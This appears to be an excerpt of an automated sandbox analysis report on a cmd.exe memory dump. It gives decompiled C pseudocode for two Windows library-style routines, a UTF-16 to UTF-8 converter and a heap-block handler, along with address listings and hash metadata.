                                                                                                                                          0x03c0042b
                                                                                                                                          0x03c0043b
                                                                                                                                          0x03c0043e
                                                                                                                                          0x03c0043f
                                                                                                                                          0x03c0043f
                                                                                                                                          0x03c00446
                                                                                                                                          0x03c00449
                                                                                                                                          0x03c0044c
                                                                                                                                          0x03c0044f
                                                                                                                                          0x03c00459
                                                                                                                                          0x03c44c8d
                                                                                                                                          0x03c0045f
                                                                                                                                          0x03c0045f
                                                                                                                                          0x03c0045f
                                                                                                                                          0x03c00467
                                                                                                                                          0x03c44c97
                                                                                                                                          0x03c44c9d
                                                                                                                                          0x03c44ca4
                                                                                                                                          0x03c44caa
                                                                                                                                          0x03c44caf
                                                                                                                                          0x03c44cb1
                                                                                                                                          0x03c44cc3
                                                                                                                                          0x03c44cb3
                                                                                                                                          0x03c44cbc
                                                                                                                                          0x03c44cbc
                                                                                                                                          0x03c44cc8
                                                                                                                                          0x03c44ccb
                                                                                                                                          0x03c44cd7
                                                                                                                                          0x03c44cda
                                                                                                                                          0x03c44cdf
                                                                                                                                          0x03c44cdf
                                                                                                                                          0x03c44ccb
                                                                                                                                          0x03c44ca4
                                                                                                                                          0x03c0046d
                                                                                                                                          0x03c0046f
                                                                                                                                          0x03c0046f
                                                                                                                                          0x03c00471
                                                                                                                                          0x03c00476
                                                                                                                                          0x03c0047a
                                                                                                                                          0x03c0047b
                                                                                                                                          0x03c00483
                                                                                                                                          0x03c00489
                                                                                                                                          0x03c0048d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44ce9
                                                                                                                                          0x03c44cef
                                                                                                                                          0x03c44d22
                                                                                                                                          0x03c44d22
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44d22
                                                                                                                                          0x03c44cf1
                                                                                                                                          0x03c44cf7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44cf9
                                                                                                                                          0x03c44cff
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44d05
                                                                                                                                          0x03c44d07
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44d0d
                                                                                                                                          0x03c44d0f
                                                                                                                                          0x03c44d14
                                                                                                                                          0x03c44d16
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44d1c
                                                                                                                                          0x03c44d1c
                                                                                                                                          0x03c00499
                                                                                                                                          0x03c00535
                                                                                                                                          0x03c00535
                                                                                                                                          0x00000000
                                                                                                                                          0x03c00535
                                                                                                                                          0x03c004a6
                                                                                                                                          0x03c44d2c
                                                                                                                                          0x03c44d37
                                                                                                                                          0x03c44d39
                                                                                                                                          0x03c44d3b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44d41
                                                                                                                                          0x03c44d48
                                                                                                                                          0x03c00527
                                                                                                                                          0x03c0052b
                                                                                                                                          0x03c0052d
                                                                                                                                          0x03c00530
                                                                                                                                          0x03c00530
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0052b
                                                                                                                                          0x03c44d4e
                                                                                                                                          0x03c004ac
                                                                                                                                          0x03c004ac
                                                                                                                                          0x03c004af
                                                                                                                                          0x03c004b2
                                                                                                                                          0x03c004b7
                                                                                                                                          0x03c004b9
                                                                                                                                          0x03c004bb
                                                                                                                                          0x03c004bd
                                                                                                                                          0x03c004bf
                                                                                                                                          0x03c004c5
                                                                                                                                          0x03c004c9
                                                                                                                                          0x03c44d53
                                                                                                                                          0x03c44d59
                                                                                                                                          0x03c44db9
                                                                                                                                          0x03c44dba
                                                                                                                                          0x03c44dbf
                                                                                                                                          0x03c44dc2
                                                                                                                                          0x03c44dc4
                                                                                                                                          0x03c44dc7
                                                                                                                                          0x03c44dce
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44dce
                                                                                                                                          0x03c44d5b
                                                                                                                                          0x03c44d61
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44d63
                                                                                                                                          0x03c44d69
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44d6b
                                                                                                                                          0x03c44d6e
                                                                                                                                          0x03c44d74
                                                                                                                                          0x03c44d76
                                                                                                                                          0x03c44d7c
                                                                                                                                          0x03c44d7e
                                                                                                                                          0x03c44d84
                                                                                                                                          0x03c44d89
                                                                                                                                          0x03c44d8c
                                                                                                                                          0x03c44d8d
                                                                                                                                          0x03c44d92
                                                                                                                                          0x03c44d95
                                                                                                                                          0x03c44d96
                                                                                                                                          0x03c44d98
                                                                                                                                          0x03c44d9a
                                                                                                                                          0x03c44d9f
                                                                                                                                          0x03c44da4
                                                                                                                                          0x03c44da6
                                                                                                                                          0x03c44da8
                                                                                                                                          0x03c44daf
                                                                                                                                          0x03c44db1
                                                                                                                                          0x03c44db1
                                                                                                                                          0x03c44daf
                                                                                                                                          0x03c44da6
                                                                                                                                          0x03c44d84
                                                                                                                                          0x03c44d7c
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44d74
                                                                                                                                          0x03c004d6
                                                                                                                                          0x03c44de1
                                                                                                                                          0x03c004dc
                                                                                                                                          0x03c004dc
                                                                                                                                          0x03c004dc
                                                                                                                                          0x03c004e4
                                                                                                                                          0x03c44deb
                                                                                                                                          0x03c44df1
                                                                                                                                          0x03c44df8
                                                                                                                                          0x03c44dfe
                                                                                                                                          0x03c44e03
                                                                                                                                          0x03c44e05
                                                                                                                                          0x03c44e17
                                                                                                                                          0x03c44e07
                                                                                                                                          0x03c44e10
                                                                                                                                          0x03c44e10
                                                                                                                                          0x03c44e1c
                                                                                                                                          0x03c44e1f
                                                                                                                                          0x03c44e35
                                                                                                                                          0x03c44e35
                                                                                                                                          0x03c44e1f
                                                                                                                                          0x03c44df8
                                                                                                                                          0x03c004f1
                                                                                                                                          0x03c004fa
                                                                                                                                          0x03c44e3f
                                                                                                                                          0x03c44e47
                                                                                                                                          0x03c44e5b
                                                                                                                                          0x03c44e61
                                                                                                                                          0x03c44e67
                                                                                                                                          0x03c44e69
                                                                                                                                          0x03c44e71
                                                                                                                                          0x03c44e73
                                                                                                                                          0x03c00500
                                                                                                                                          0x03c00500
                                                                                                                                          0x03c00500
                                                                                                                                          0x03c004fa
                                                                                                                                          0x03c00508
                                                                                                                                          0x03c0051d
                                                                                                                                          0x03c0051d
                                                                                                                                          0x03c0051f
                                                                                                                                          0x03c00524
                                                                                                                                          0x00000000
                                                                                                                                          0x03c00524
                                                                                                                                          0x03c00515
                                                                                                                                          0x03c00517
                                                                                                                                          0x03c44e7a
                                                                                                                                          0x03c44e7c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44e85
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44e85
                                                                                                                                          0x00000000
                                                                                                                                          0x03c00517

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4ce9873594e5888ec8e1203378953867976462516a8a7e0c0cdad3b48a2f0607
                                                                                                                                          • Instruction ID: f740a414927d1b45f9de8404a76444e5a2d30032ca9778eaca0757098b00100a
                                                                                                                                          • Opcode Fuzzy Hash: 4ce9873594e5888ec8e1203378953867976462516a8a7e0c0cdad3b48a2f0607
                                                                                                                                          • Instruction Fuzzy Hash: FA915D75E007A49FDB25EBA9C848BADB7A4EF01714F1B02A1E911EF2D0DB749E40C785
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0EBB0 Relevance: .2, Instructions: 250COMMONLIBRARYCODECrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C0EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E03C0ED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                                                                                                                                          0x03c0ebb8
                                                                                                                                          0x03c0ebbf
                                                                                                                                          0x03c0ebc1
                                                                                                                                          0x03c0ebc6
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b6d6
                                                                                                                                          0x03c0ebcd
                                                                                                                                          0x03c0ebd2
                                                                                                                                          0x03c0ec95
                                                                                                                                          0x03c4b6e0
                                                                                                                                          0x03c0ec9b
                                                                                                                                          0x03c0eca1
                                                                                                                                          0x03c0eca1
                                                                                                                                          0x03c0ec89
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ec89
                                                                                                                                          0x03c0ebd8
                                                                                                                                          0x03c0ebdd
                                                                                                                                          0x03c4b6ea
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ebe3
                                                                                                                                          0x03c0ebe5
                                                                                                                                          0x03c0ebe7
                                                                                                                                          0x03c0ebef
                                                                                                                                          0x03c0ebf2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ebf5
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ebf5
                                                                                                                                          0x03c0ebf5
                                                                                                                                          0x03c0ebf7
                                                                                                                                          0x03c4b6f6
                                                                                                                                          0x03c0ec7c
                                                                                                                                          0x03c0ec7c
                                                                                                                                          0x03c0ec7f
                                                                                                                                          0x03c0ec82
                                                                                                                                          0x03c0ec87
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ec87
                                                                                                                                          0x03c0ec1a
                                                                                                                                          0x03c0ec1a
                                                                                                                                          0x03c0ec25
                                                                                                                                          0x03c4b725
                                                                                                                                          0x03c4b72c
                                                                                                                                          0x03c4b72c
                                                                                                                                          0x03c0ec2d
                                                                                                                                          0x03c0ec31
                                                                                                                                          0x03c4b73c
                                                                                                                                          0x03c4b744
                                                                                                                                          0x03c4b748
                                                                                                                                          0x03c4b748
                                                                                                                                          0x03c4b749
                                                                                                                                          0x03c4b749
                                                                                                                                          0x03c4b74a
                                                                                                                                          0x03c4b74a
                                                                                                                                          0x03c0ec3e
                                                                                                                                          0x03c4b860
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ec44
                                                                                                                                          0x03c0ec47
                                                                                                                                          0x03c4b750
                                                                                                                                          0x03c4b758
                                                                                                                                          0x03c4b767
                                                                                                                                          0x03c4b775
                                                                                                                                          0x03c4b77c
                                                                                                                                          0x03c4b77f
                                                                                                                                          0x03c4b769
                                                                                                                                          0x03c4b76c
                                                                                                                                          0x03c4b76c
                                                                                                                                          0x03c4b781
                                                                                                                                          0x03c4b788
                                                                                                                                          0x03c4b78b
                                                                                                                                          0x03c4b75a
                                                                                                                                          0x03c4b75d
                                                                                                                                          0x03c4b75d
                                                                                                                                          0x03c4b78d
                                                                                                                                          0x03c4b792
                                                                                                                                          0x03c4b793
                                                                                                                                          0x03c4b793
                                                                                                                                          0x03c0ec54
                                                                                                                                          0x03c0ec56
                                                                                                                                          0x03c0ec57
                                                                                                                                          0x03c0ec59
                                                                                                                                          0x03c0ec5e
                                                                                                                                          0x03c0ecaa
                                                                                                                                          0x03c0ed16
                                                                                                                                          0x03c0ed16
                                                                                                                                          0x03c0ecac
                                                                                                                                          0x03c0ecaf
                                                                                                                                          0x03c0ecb4
                                                                                                                                          0x03c0ecb6
                                                                                                                                          0x03c0ecb6
                                                                                                                                          0x03c0ecb9
                                                                                                                                          0x03c0ecbf
                                                                                                                                          0x03c4b7c1
                                                                                                                                          0x03c4b7c8
                                                                                                                                          0x03c4b7d3
                                                                                                                                          0x03c4b7db
                                                                                                                                          0x03c4b7ec
                                                                                                                                          0x03c4b858
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b858
                                                                                                                                          0x03c4b7ee
                                                                                                                                          0x03c4b7f1
                                                                                                                                          0x03c4b7f4
                                                                                                                                          0x03c4b7ff
                                                                                                                                          0x03c4b850
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b850
                                                                                                                                          0x03c4b80a
                                                                                                                                          0x03c4b813
                                                                                                                                          0x03c4b81c
                                                                                                                                          0x03c4b81d
                                                                                                                                          0x03c4b822
                                                                                                                                          0x03c4b825
                                                                                                                                          0x03c4b828
                                                                                                                                          0x03c4b831
                                                                                                                                          0x03c4b832
                                                                                                                                          0x03c4b837
                                                                                                                                          0x03c4b840
                                                                                                                                          0x03c4b842
                                                                                                                                          0x03c4b845
                                                                                                                                          0x03c4b848
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b848
                                                                                                                                          0x03c4b7df
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b7df
                                                                                                                                          0x03c4b7cc
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b7cc
                                                                                                                                          0x03c0ecc5
                                                                                                                                          0x03c0ecc7
                                                                                                                                          0x03c0eccb
                                                                                                                                          0x03c4b79b
                                                                                                                                          0x03c4b79e
                                                                                                                                          0x03c4b7a4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b7a6
                                                                                                                                          0x03c4b7a8
                                                                                                                                          0x03c4b7a8
                                                                                                                                          0x03c0ecd3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ecd5
                                                                                                                                          0x03c0ecd5
                                                                                                                                          0x03c0ecd5
                                                                                                                                          0x03c0ecd8
                                                                                                                                          0x03c0ecda
                                                                                                                                          0x03c0ece4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ecea
                                                                                                                                          0x03c0eced
                                                                                                                                          0x03c0ecf0
                                                                                                                                          0x03c0ecf2
                                                                                                                                          0x03c0ecfb
                                                                                                                                          0x03c0ecfe
                                                                                                                                          0x03c0ed01
                                                                                                                                          0x03c0ed06
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ed06
                                                                                                                                          0x03c4b7ae
                                                                                                                                          0x03c4b7b1
                                                                                                                                          0x03c4b7b7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b7b9
                                                                                                                                          0x03c4b7bb
                                                                                                                                          0x03c0ed08
                                                                                                                                          0x03c0ed08
                                                                                                                                          0x03c0ed0c
                                                                                                                                          0x03c0ed0c
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ec60
                                                                                                                                          0x03c0ec62
                                                                                                                                          0x03c0ed0f
                                                                                                                                          0x03c0ed0f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ed0f
                                                                                                                                          0x03c0ec68
                                                                                                                                          0x03c0ec6c
                                                                                                                                          0x03c0ec6f
                                                                                                                                          0x03c0ec75
                                                                                                                                          0x03c0ec0d
                                                                                                                                          0x03c0ec0d
                                                                                                                                          0x03c0ec18
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ec18
                                                                                                                                          0x03c0ec77
                                                                                                                                          0x03c0ec79
                                                                                                                                          0x03c0ec79
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ec68
                                                                                                                                          0x03c0ec5e
                                                                                                                                          0x03c0ec3e
                                                                                                                                          0x03c0ebfd
                                                                                                                                          0x03c0ec02
                                                                                                                                          0x03c4b701
                                                                                                                                          0x03c4b70c
                                                                                                                                          0x03c4b71b
                                                                                                                                          0x03c4b71d
                                                                                                                                          0x03c4b71d
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b70c
                                                                                                                                          0x03c0ec08
                                                                                                                                          0x03c0ec0a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0ec0a
                                                                                                                                          0x03c0ebf5
                                                                                                                                          0x03c0ebf5

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                                                                                                          • Instruction ID: 353341fa48f9ebc39800fd607b6535812a6ed124ae425ee2395735f8d0fbaf7c
                                                                                                                                          • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                                                                                                          • Instruction Fuzzy Hash: 03812832A846968BDB25CE7DC5C02BDFB54EF52310B2C4ABAD882CF381C225DD46D791
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA25DD Relevance: .2, Instructions: 232COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                          			E03CA25DD(intOrPtr __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				E03CA2E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_t187 = 0x10;
				_t210 = (( *_t133 ^  *0x3cc6110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x3cc6110; // 0x44ec91fe
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x3cc6110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_t154 = 0x3f;
				_v12 = E03C1D340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E03C1D0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						E03BEFFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x3bbac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x3bbac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
					_t47 = _t175 + 0x3bbac00; // 0x6060706
					_t48 = _t123 + 0x3bbac00; // 0x6070708
					_t142 = _v16;
					if(E03CA2FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E03BF2280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x3cc6110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x3cc6110; // 0x44ec91fe
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x3cc6110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x3cc6110 ^ _t168) & 0x7fff0000;
					}
					E03CA241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}











































                                                                                                                                          0x03ca25e6
                                                                                                                                          0x03ca25f6
                                                                                                                                          0x03ca25fb
                                                                                                                                          0x03ca25fe
                                                                                                                                          0x03ca2603
                                                                                                                                          0x03ca2610
                                                                                                                                          0x03ca2611
                                                                                                                                          0x03ca2613
                                                                                                                                          0x03ca262f
                                                                                                                                          0x03ca2634
                                                                                                                                          0x03ca2639
                                                                                                                                          0x03ca2641
                                                                                                                                          0x03ca2643
                                                                                                                                          0x03ca2646
                                                                                                                                          0x03ca2648
                                                                                                                                          0x03ca2649
                                                                                                                                          0x03ca2649
                                                                                                                                          0x03ca2649
                                                                                                                                          0x03ca2646
                                                                                                                                          0x03ca263b
                                                                                                                                          0x03ca263b
                                                                                                                                          0x03ca263d
                                                                                                                                          0x03ca263d
                                                                                                                                          0x03ca2639
                                                                                                                                          0x03ca2651
                                                                                                                                          0x03ca2653
                                                                                                                                          0x03ca2655
                                                                                                                                          0x03ca2657
                                                                                                                                          0x03ca265c
                                                                                                                                          0x03ca2668
                                                                                                                                          0x03ca266a
                                                                                                                                          0x03ca2675
                                                                                                                                          0x03ca267c
                                                                                                                                          0x03ca2680
                                                                                                                                          0x03ca2684
                                                                                                                                          0x03ca2687
                                                                                                                                          0x03ca2692
                                                                                                                                          0x03ca2695
                                                                                                                                          0x03ca2698
                                                                                                                                          0x03ca269d
                                                                                                                                          0x03ca26a2
                                                                                                                                          0x03ca26a4
                                                                                                                                          0x03ca26a4
                                                                                                                                          0x03ca26a8
